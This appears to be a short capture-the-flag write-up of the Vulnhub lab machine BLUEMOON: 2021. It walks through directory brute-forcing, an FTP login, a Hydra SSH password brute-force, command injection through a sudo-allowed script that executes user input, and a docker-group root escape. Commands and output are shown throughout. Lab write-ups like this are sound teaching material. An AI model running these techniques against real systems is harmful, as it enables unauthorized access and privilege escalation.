Vulnhub: BLUEMOON: 2021
BLUEMOON: 2021
This is BLUEMOON: 2021 from Vulnhub. It is easy rated and I picked it to do because someone on the Vulnhub discord was looking for a write-up, which made me think maybe it was challenging. After that - and before I got a chance to do it myself - someone else posted a writeup, but I didn’t read it. Nevertheless, this is going to be super short, because it was pretty simple. Let’s go.
Ports
FTP, SSH and HTTP. No anon on the FTP.
Web
It needs some heavy enumeration to find what we want:
──(root💀kali)-[/opt/vulnhub/bluemoon]
└─# feroxbuster -u http://192.168.1.203 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -C 403
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.203
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💢 Status Code Filters │ [403]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 45l 109w 1169c http://192.168.1.203/hidden_text
[####################] - 4m 1273785/1273785 0s found:1 errors:1219
[####################] - 4m 1273785/1273785 4912/s http://192.168.1.203Once we have it, we get a link to a QR code which contains FTP credentials.
FTP
When we login to FTP we get this:
┌──(root💀kali)-[/opt/vulnhub/bluemoon]
└─# ftp 192.168.1.203 130 ⨯
Connected to 192.168.1.203.
220 (vsFTPd 3.0.3)
Name (192.168.1.203:root): userftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lash
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Mar 08 00:28 .
drwxr-xr-x 3 1001 1001 4096 Mar 08 00:24 ..
-rw-r--r-- 1 0 0 147 Mar 08 00:27 information.txt
-rw-r--r-- 1 0 0 363 Mar 08 00:28 p_lists.txtAnd that contains a username (in the ‘information.txt’) and a list of passwords. Hydra makes short work of it.
──(root💀kali)-[/opt/vulnhub/bluemoon]
└─# hydra -l robin -P ./p_lists.txt ssh://192.168.1.203
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-18 05:23:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:1/p:32), ~2 tries per task
[DATA] attacking ssh://192.168.1.203:22/
[22][ssh] host: 192.168.1.203 login: robin password: k4rv3ndh4nh4ck3r
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-18 05:23:32And we can SSH in.
Robin
Robin can do this:
robin@BlueMoon:~/project$ sudo -l
Matching Defaults entries for robin on bluemoon:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User robin may run the following commands on bluemoon:
(jerry) NOPASSWD: /home/robin/project/feedback.shWhich is:
robin@BlueMoon:~/project$ cat feedback.sh
#!/bin/bash
clear
echo -e "Script For FeedBack\n"
read -p "Enter Your Name : " name
echo ""
read -p "Enter You FeedBack About This Target Machine : " feedback
echo ""
$feedback 2>/dev/null
echo -e "\nThanks For Your FeedBack...!\n"In case it’s not obvious, whatever is entered on the second read will be executed. I use sh to get a shell as Jerry and then upgrade it with python.
Jerry > root
Jerry is in the docker group:
id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)
docker run -it -v /:/mnt alpine chroot /mnt
root@a93f401a9aa9:/# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
root@a93f401a9aa9:/# id;date;hostname
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
Sun Apr 18 01:40:42 PDT 2021
a93f401a9aa9
root@a93f401a9aa9:/#So that was that, see ya.